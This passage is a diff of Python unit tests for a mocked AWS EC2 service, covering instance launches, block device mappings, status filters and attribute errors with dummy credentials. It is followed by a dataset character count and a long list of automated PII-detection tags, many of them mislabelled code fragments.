detached instance and ENI data + instance.update() + instance.interfaces.should.have.length_of(1) + + eni = conn.get_all_network_interfaces(filters={""network-interface-id"": eni.id})[0] + eni.groups.should.have.length_of(1) + set([group.id for group in eni.groups]).should.equal(set([security_group2.id])) + + # Detach with invalid attachment ID + with pytest.raises(EC2ResponseError) as cm: + conn.detach_network_interface(""eni-attach-1234abcd"") + cm.value.code.should.equal(""InvalidAttachmentID.NotFound"") + cm.value.status.should.equal(400) + cm.value.request_id.should_not.be.none + + +@mock_ec2_deprecated +def test_ec2_classic_has_public_ip_address(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"") + instance = reservation.instances[0] + instance.ip_address.should_not.equal(None) + instance.public_dns_name.should.contain(instance.ip_address.replace(""."", ""-"")) + instance.private_ip_address.should_not.equal(None) + instance.private_dns_name.should.contain( + instance.private_ip_address.replace(""."", ""-"") + ) + + +@mock_ec2_deprecated +def test_run_instance_with_keypair(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"") + instance = reservation.instances[0] + + instance.key_name.should.equal(""keypair_name"") + + +@mock_ec2 +def test_run_instance_with_block_device_mappings(): + ec2_client = boto3.client(""ec2"", region_name=""us-east-1"") + + kwargs = { + ""MinCount"": 1, + ""MaxCount"": 1, + ""ImageId"": EXAMPLE_AMI_ID, + ""KeyName"": ""the_key"", + ""InstanceType"": ""t1.micro"", + ""BlockDeviceMappings"": [{""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeSize"": 50}}], + } + + ec2_client.run_instances(**kwargs) + + instances = ec2_client.describe_instances() + volume = instances[""Reservations""][0][""Instances""][0][""BlockDeviceMappings""][0][ + ""Ebs"" + ] + + volumes = ec2_client.describe_volumes(VolumeIds=[volume[""VolumeId""]]) + volumes[""Volumes""][0][""Size""].should.equal(50) + + +@mock_ec2 +def test_run_instance_with_block_device_mappings_missing_ebs(): + ec2_client = boto3.client(""ec2"", region_name=""us-east-1"") + + kwargs = { + ""MinCount"": 1, + ""MaxCount"": 1, + ""ImageId"": EXAMPLE_AMI_ID, + ""KeyName"": ""the_key"", + ""InstanceType"": ""t1.micro"", + ""BlockDeviceMappings"": [{""DeviceName"": ""/dev/sda2""}], + } + with pytest.raises(ClientError) as ex: + ec2_client.run_instances(**kwargs) + + ex.value.response[""Error""][""Code""].should.equal(""MissingParameter"") + ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400) + ex.value.response[""Error""][""Message""].should.equal( + ""The request must contain the parameter ebs"" + ) + + +@mock_ec2 +def test_run_instance_with_block_device_mappings_missing_size(): + ec2_client = boto3.client(""ec2"", region_name=""us-east-1"") + + kwargs = { + ""MinCount"": 1, + ""MaxCount"": 1, + ""ImageId"": EXAMPLE_AMI_ID, + ""KeyName"": ""the_key"", + ""InstanceType"": ""t1.micro"", + ""BlockDeviceMappings"": [ + {""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeType"": ""standard""}} + ], + } + with pytest.raises(ClientError) as ex: + ec2_client.run_instances(**kwargs) + + ex.value.response[""Error""][""Code""].should.equal(""MissingParameter"") + ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400) + ex.value.response[""Error""][""Message""].should.equal( + ""The request must contain the parameter size or 
snapshotId"" + ) + + +@mock_ec2 +def test_run_instance_with_block_device_mappings_from_snapshot(): + ec2_client = boto3.client(""ec2"", region_name=""us-east-1"") + ec2_resource = boto3.resource(""ec2"", region_name=""us-east-1"") + volume_details = { + ""AvailabilityZone"": ""1a"", + ""Size"": 30, + } + + volume = ec2_resource.create_volume(**volume_details) + snapshot = volume.create_snapshot() + kwargs = { + ""MinCount"": 1, + ""MaxCount"": 1, + ""ImageId"": EXAMPLE_AMI_ID, + ""KeyName"": ""the_key"", + ""InstanceType"": ""t1.micro"", + ""BlockDeviceMappings"": [ + {""DeviceName"": ""/dev/sda2"", ""Ebs"": {""SnapshotId"": snapshot.snapshot_id}} + ], + } + + ec2_client.run_instances(**kwargs) + + instances = ec2_client.describe_instances() + volume = instances[""Reservations""][0][""Instances""][0][""BlockDeviceMappings""][0][ + ""Ebs"" + ] + + volumes = ec2_client.describe_volumes(VolumeIds=[volume[""VolumeId""]]) + + volumes[""Volumes""][0][""Size""].should.equal(30) + volumes[""Volumes""][0][""SnapshotId""].should.equal(snapshot.snapshot_id) + + +@mock_ec2_deprecated +def test_describe_instance_status_no_instances(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + all_status = conn.get_all_instance_status() + len(all_status).should.equal(0) + + +@mock_ec2_deprecated +def test_describe_instance_status_with_instances(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"") + + all_status = conn.get_all_instance_status() + len(all_status).should.equal(1) + all_status[0].instance_status.status.should.equal(""ok"") + all_status[0].system_status.status.should.equal(""ok"") + + +@mock_ec2_deprecated +def test_describe_instance_status_with_instance_filter_deprecated(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + + # We want to filter based on this one + reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"") + instance = reservation.instances[0] + + # This is just to setup the test + conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"") + + all_status = conn.get_all_instance_status(instance_ids=[instance.id]) + len(all_status).should.equal(1) + all_status[0].id.should.equal(instance.id) + + # Call get_all_instance_status with a bad id should raise an error + with pytest.raises(EC2ResponseError) as cm: + conn.get_all_instance_status(instance_ids=[instance.id, ""i-1234abcd""]) + cm.value.code.should.equal(""InvalidInstanceID.NotFound"") + cm.value.status.should.equal(400) + cm.value.request_id.should_not.be.none + + +@mock_ec2 +def test_describe_instance_credit_specifications(): + conn = boto3.client(""ec2"", region_name=""us-west-1"") + + # We want to filter based on this one + reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1) + result = conn.describe_instance_credit_specifications( + InstanceIds=[reservation[""Instances""][0][""InstanceId""]] + ) + assert ( + result[""InstanceCreditSpecifications""][0][""InstanceId""] + == reservation[""Instances""][0][""InstanceId""] + ) + + +@mock_ec2 +def test_describe_instance_status_with_instance_filter(): + conn = boto3.client(""ec2"", region_name=""us-west-1"") + + # We want to filter based on this one + reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=3, MaxCount=3) + instance1 = reservation[""Instances""][0] + instance2 = reservation[""Instances""][1] + instance3 = reservation[""Instances""][2] + conn.stop_instances(InstanceIds=[instance1[""InstanceId""]]) + stopped_instance_ids = 
[instance1[""InstanceId""]] + running_instance_ids = sorted([instance2[""InstanceId""], instance3[""InstanceId""]]) + all_instance_ids = sorted(stopped_instance_ids + running_instance_ids) + + # Filter instance using the state name + state_name_filter = { + ""running_and_stopped"": [ + {""Name"": ""instance-state-name"", ""Values"": [""running"", ""stopped""]} + ], + ""running"": [{""Name"": ""instance-state-name"", ""Values"": [""running""]}], + ""stopped"": [{""Name"": ""instance-state-name"", ""Values"": [""stopped""]}], + } + + found_statuses = conn.describe_instance_status( + IncludeAllInstances=True, Filters=state_name_filter[""running_and_stopped""] + )[""InstanceStatuses""] + found_instance_ids = [status[""InstanceId""] for status in found_statuses] + sorted(found_instance_ids).should.equal(all_instance_ids) + + found_statuses = conn.describe_instance_status( + IncludeAllInstances=True, Filters=state_name_filter[""running""] + )[""InstanceStatuses""] + found_instance_ids = [status[""InstanceId""] for status in found_statuses] + sorted(found_instance_ids).should.equal(running_instance_ids) + + found_statuses = conn.describe_instance_status( + IncludeAllInstances=True, Filters=state_name_filter[""stopped""] + )[""InstanceStatuses""] + found_instance_ids = [status[""InstanceId""] for status in found_statuses] + sorted(found_instance_ids).should.equal(stopped_instance_ids) + + # Filter instance using the state code + state_code_filter = { + ""running_and_stopped"": [ + {""Name"": ""instance-state-code"", ""Values"": [""16"", ""80""]} + ], + ""running"": [{""Name"": ""instance-state-code"", ""Values"": [""16""]}], + ""stopped"": [{""Name"": ""instance-state-code"", ""Values"": [""80""]}], + } + + found_statuses = conn.describe_instance_status( + IncludeAllInstances=True, Filters=state_code_filter[""running_and_stopped""] + )[""InstanceStatuses""] + found_instance_ids = [status[""InstanceId""] for status in found_statuses] + sorted(found_instance_ids).should.equal(all_instance_ids) + + found_statuses = conn.describe_instance_status( + IncludeAllInstances=True, Filters=state_code_filter[""running""] + )[""InstanceStatuses""] + found_instance_ids = [status[""InstanceId""] for status in found_statuses] + sorted(found_instance_ids).should.equal(running_instance_ids) + + found_statuses = conn.describe_instance_status( + IncludeAllInstances=True, Filters=state_code_filter[""stopped""] + )[""InstanceStatuses""] + found_instance_ids = [status[""InstanceId""] for status in found_statuses] + sorted(found_instance_ids).should.equal(stopped_instance_ids) + + +@requires_boto_gte(""2.32.0"") +@mock_ec2_deprecated +def test_describe_instance_status_with_non_running_instances(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3) + instance1, instance2, instance3 = reservation.instances + instance1.stop() + instance2.terminate() + + all_running_status = conn.get_all_instance_status() + all_running_status.should.have.length_of(1) + all_running_status[0].id.should.equal(instance3.id) + all_running_status[0].state_name.should.equal(""running"") + + all_status = conn.get_all_instance_status(include_all_instances=True) + all_status.should.have.length_of(3) + + status1 = next((s for s in all_status if s.id == instance1.id), None) + status1.state_name.should.equal(""stopped"") + + status2 = next((s for s in all_status if s.id == instance2.id), None) + status2.state_name.should.equal(""terminated"") + + status3 = next((s for s in all_status if 
s.id == instance3.id), None) + status3.state_name.should.equal(""running"") + + +@mock_ec2_deprecated +def test_get_instance_by_security_group(): + conn = boto.connect_ec2(""the_key"", ""the_secret"") + + conn.run_instances(EXAMPLE_AMI_ID) + instance = conn.get_only_instances()[0] + + security_group = conn.create_security_group(""test"", ""test"") + + with pytest.raises(EC2ResponseError) as ex: + conn.modify_instance_attribute( + instance.id, ""groupSet"", [security_group.id], dry_run=True + ) + ex.value.error_code.should.equal(""DryRunOperation"") + ex.value.status.should.equal(400) + ex.value.message.should.equal( + ""An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set"" + ) + + conn.modify_instance_attribute(instance.id, ""groupSet"", [security_group.id]) + + security_group_instances = security_group.instances() + + assert len(security_group_instances) == 1 + assert security_group_instances[0].id == instance.id + + +@mock_ec2 +def test_modify_delete_on_termination(): + ec2_client = boto3.resource(""ec2"", region_name=""us-west-1"") + result = ec2_client.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1) + instance = result[0] + instance.load() + instance.block_device_mappings[0][""Ebs""][""DeleteOnTermination""].should.be(True) + instance.modify_attribute( + BlockDeviceMappings=[ + {""DeviceName"": ""/dev/sda1"", ""Ebs"": {""DeleteOnTermination"": False}} + ] + ) + instance.load() + instance.block_device_mappings[0][""Ebs""][""DeleteOnTermination""].should.be(False) + + +@mock_ec2 +def test_create_instance_ebs_optimized(): + ec2_resource = boto3.resource(""ec2"", region_name=""eu-west-1"") + + instance = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, EbsOptimized=True + )[0] + instance.load() + instance.ebs_optimized.should.be(True) + + instance.modify_attribute(EbsOptimized={""Value"": False}) + instance.load() + instance.ebs_optimized.should.be(False) + + instance = ec2_resource.create_instances( + ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, + )[0] + instance.load() + instance.ebs_optimized.should.be(False) + + +@mock_ec2 +def test_run_multiple_instances_in_same_command(): + instance_count = 4 + client = boto3.client(""ec2"", region_name=""us-east-1"") + client.run_instances( + ImageId=EXAMPLE_AMI_ID, MinCount=instance_count, MaxCount=instance_count + ) + reservations = client.describe_instances()[""Reservations""] + + reservations[0][""Instances""].should.have.length_of(instance_count) + + instances = reservations[0][""Instances""] + for i in range(0, instance_count): + instances[i][""AmiLaunchIndex""].should.be(i) + + +@mock_ec2 +def test_describe_instance_attribute(): + client = boto3.client(""ec2"", region_name=""us-east-1"") + security_group_id = client.create_security_group( + GroupName=""test security group"", Description=""this is a test security group"" + )[""GroupId""] + client.run_instances( + ImageId=EXAMPLE_AMI_ID, + MinCount=1, + MaxCount=1, + SecurityGroupIds=[security_group_id], + ) + instance_id = client.describe_instances()[""Reservations""][0][""Instances""][0][ + ""InstanceId"" + ] + + valid_instance_attributes = [ + ""instanceType"", + ""kernel"", + ""ramdisk"", + ""userData"", + ""disableApiTermination"", + ""instanceInitiatedShutdownBehavior"", + ""rootDeviceName"", + ""blockDeviceMapping"", + ""productCodes"", + ""sourceDestCheck"", + ""groupSet"", + ""ebsOptimized"", + ""sriovNetSupport"", + ] + + for 
valid_instance_attribute in valid_instance_attributes: + response = client.describe_instance_attribute( + InstanceId=instance_id, Attribute=valid_instance_attribute + ) + if valid_instance_attribute == ""groupSet"": + response.should.have.key(""Groups"") + response[""Groups""].should.have.length_of(1) + response[""Groups""][0][""GroupId""].should.equal(security_group_id) + elif valid_instance_attribute == ""userData"": + response.should.have.key(""UserData"") + response[""UserData""].should.be.empty + + invalid_instance_attributes = [ + ""abc"", + ""Kernel"", + ""RamDisk"", + ""userdata"", + ""iNsTaNcEtYpE"", + ] + + for invalid_instance_attribute in invalid_instance_attributes: + with pytest.raises(ClientError) as ex: + client.describe_instance_attribute( + InstanceId=instance_id, Attribute=invalid_instance_attribute + ) + ex.value.response[""Error""][""Code""].should.equal(""InvalidParameterValue"") + ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400) + message = ""Value ({invalid_instance_attribute}) for parameter attribute is invalid. Unknown attribute."".format( + invalid_instance_attribute=invalid_instance_attribute + ) + ex.value.response[""Error""][""Message""].should.equal(message) + + +@mock_ec2 +def test_warn_on_invalid_ami(): + if settings.TEST_SERVER_MODE: + raise SkipTest(""Can't capture warnings in server mode."") + ec2 = boto3.resource(""ec2"", ""us-east-1"") + with pytest.warns( + PendingDeprecationWarning, + match=r""Could not find AMI with image-id:invalid-ami.+"", + ): + ec2.create_instances(ImageId=""invalid-ami"", MinCount=1, MaxCount=1) +",62433,"[['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.99.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '192.168.42.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['PERSON', 'conn = boto.connect_ec2'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'zone=conn.region.name'], ['LOCATION', 'test_get_paginated_instances'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'instance3'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['LOCATION', 'min_count=1'], ['LOCATION', 'min_count=1'], ['PERSON', 'min_count=1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'conn = boto3.resource(""ec2'], ['PERSON', 'conn = boto3.resource(""ec2'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['LOCATION', 'reservations[0].instances.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = 
boto.connect_ec2(""the_key'], ['PERSON', 'Boto'], ['PERSON', 'DryRun'], ['PERSON', 'test_user_data_with_run_instance'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['PERSON', 'instance.groups.should.have.length_of(2'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['PERSON', 'Boto'], ['PERSON', 'instance.interfaces.should.have.length_of(1'], ['PERSON', 'conn = boto.connect_vpc(""the_key'], ['PERSON', 'DryRun'], ['PERSON', 'DryRun'], ['PERSON', 'instance.interfaces.should.have.length_of(1'], ['PERSON', 'conn.detach_network_interface(""eni-attach-1234abcd'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto3.client(""ec2'], ['PERSON', 'conn = boto3.client(""ec2'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'conn = boto.connect_ec2(""the_key'], ['PERSON', 'DryRun'], ['DATE_TIME', 'test_warn_on_invalid_ami'], ['DATE_TIME', '2014-01-01'], ['DATE_TIME', '2014-01-01'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.1.0.0'], ['IP_ADDRESS', '10.1.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['IP_ADDRESS', '10.0.0.0'], ['URL', 'boto.ec2.in'], ['URL', 'six.PY'], ['URL', 'base64.de'], ['URL', 'base64.de'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'boto.co'], ['URL', 'conn.ge'], ['URL', 'instance1.im'], ['URL', 'boto.ec2.co'], ['URL', 'conn.ru'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'conn.ru'], ['URL', 'reservation.should.be'], ['URL', 'reservation.instances.sh'], ['URL', 'reservation.in'], ['URL', 'instance.state.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.id.sh'], ['URL', 'reservation.id'], ['URL', 'instances.sh'], ['URL', 'instance.id.sh'], ['URL', 'instance.id'], ['URL', 'instance.state.sh'], ['URL', 'instance.la'], ['URL', 'time.sh'], ['URL', 'id.sh'], ['URL', 'instance.placement.sh'], ['URL', 'instance.ro'], ['URL', '.status.sh'], ['URL', 'id.should.ma'], ['URL', 'conn.ge'], ['URL', 'volume.at'], ['URL', 'data.in'], ['URL', 'id.sh'], ['URL', 'instance.id'], ['URL', 'volume.status.sh'], ['URL', 'instance.id'], ['URL', 'ex.value.er'], ['URL', 'code.sh'], ['URL', 'ex.value.status.sh'], ['URL', 'ex.value.message.sh'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'instance.state.sh'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'volume.state.sh'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'instance.de'], ['URL', 'resource.volumes.al'], ['URL', 'boto3.re'], ['URL', 'resource.cr'], ['URL', 'instance.volumes.al'], ['URL', 'instance.de'], ['URL', 'ex.value.re'], ['URL', 'InvalidAttachment.No'], ['URL', 'ex.value.re'], ['URL', 'ex.value.re'], ['URL', 'instance.in'], 
['URL', 'boto.co'], ['URL', 'instances.when.ca'], ['URL', '.should.th'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol1.at'], ['URL', 'instance.id'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol2.at'], ['URL', 'instance.id'], ['URL', 'conn.cr'], ['URL', 'conn.region.na'], ['URL', 'vol3.at'], ['URL', 'instance.id'], ['URL', 'conn.ge'], ['URL', 'mapping.sh'], ['URL', 'conn.ge'], ['URL', 'v.at'], ['URL', 'data.in'], ['URL', 'id.sh'], ['URL', 'instance.id'], ['URL', 'v.at'], ['URL', 'data.at'], ['URL', 'time.sh'], ['URL', 'instance.la'], ['URL', 'v.cr'], ['URL', 'time.sh'], ['URL', 'instance.la'], ['URL', 'v.region.name.sh'], ['URL', 'instance.region.na'], ['URL', 'v.status.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'reservations.sh'], ['URL', 'reservation.instances.sh'], ['URL', 'reservation.in'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'reservations.sh'], ['URL', 'reservation.instances.sh'], ['URL', 'instance.id'], ['URL', 'reservation.in'], ['URL', 'ids.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'cm.value.code.sh'], ['URL', 'InvalidInstanceID.No'], ['URL', 'cm.value.status.sh'], ['URL', 'cm.value.re'], ['URL', 'id.sh'], ['URL', 'not.be.no'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'token.sh'], ['URL', 'not.be.no'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'resp2.ke'], ['URL', 'boto3.cl'], ['URL', 'ec2.ru'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'instance.id'], ['URL', 'instance2.id'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'instance2.id'], ['URL', 'reservations.sh'], ['URL', 'instance.id'], ['URL', 'ids.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.when.ca'], ['URL', '.should.th'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', '.instances.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'm1.sm'], ['URL', 'reservation1.in'], ['URL', 'conn.ru'], ['URL', 'm1.sm'], ['URL', 'reservation2.in'], ['URL', 'conn.ru'], ['URL', 'reservation3.in'], ['URL', 'conn.ge'], ['URL', 'm1.sm'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'm1.sm'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 'instance2.id'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.st'], ['URL', 'conn.ge'], ['URL', 'Client.Us'], ['URL', '.instances.sh'], ['URL', 'instance1.id'], ['URL', 
'instance2.id'], ['URL', 'i.id'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.mo'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'boto.co'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc1.id'], ['URL', 'conn.ru'], ['URL', 'subnet1.id'], ['URL', 'reservation1.in'], ['URL', 'conn.cr'], ['URL', 'conn.cr'], ['URL', 'vpc2.id'], ['URL', 'conn.ru'], ['URL', 'subnet2.id'], ['URL', 'reservation2.in'], ['URL', 'conn.ge'], ['URL', 'vpc1.id'], ['URL', 'reservations1.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'id.sh'], ['URL', 'vpc1.id'], ['URL', 'id.sh'], ['URL', 'subnet1.id'], ['URL', 'conn.ge'], ['URL', 'vpc2.id'], ['URL', 'reservations2.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'id.sh'], ['URL', 'vpc2.id'], ['URL', 'id.sh'], ['URL', 'subnet2.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'conn.ge'], ['URL', '.instances.sh'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'ip-10-0-0-1.ec2.int'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'conn.cr'], ['URL', 'client.de'], ['URL', 'network-interface.pr'], ['URL', 'ip-10-0-0-1.us-west-2.compute.int'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'instance.gr'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'instance.gr'], ['URL', 'boto3.cl'], ['URL', 'client.cr'], ['URL', 'client.cr'], ['URL', 'client.ru'], ['URL', 'client.de'], ['URL', 'reservations.sh'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'boto.co'], ['URL', 'conn.ru'], ['URL', 'reservation.in'], ['URL', 'instance1.ad'], ['URL', 'instance1.ad'], ['URL', 'instance2.ad'], ['URL', 'instance2.ad'], ['URL', 'instance3.ad'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], ['URL', 'instance1.id'], ['URL', '.id.sh'], ['URL', 'instance2.id'], ['URL', '.id.sh'], ['URL', 'instance3.id'], ['URL', 'conn.ge'], ['URL', 'reservations.sh'], ['URL', '.instances.sh'], ['URL', '.id.sh'], 
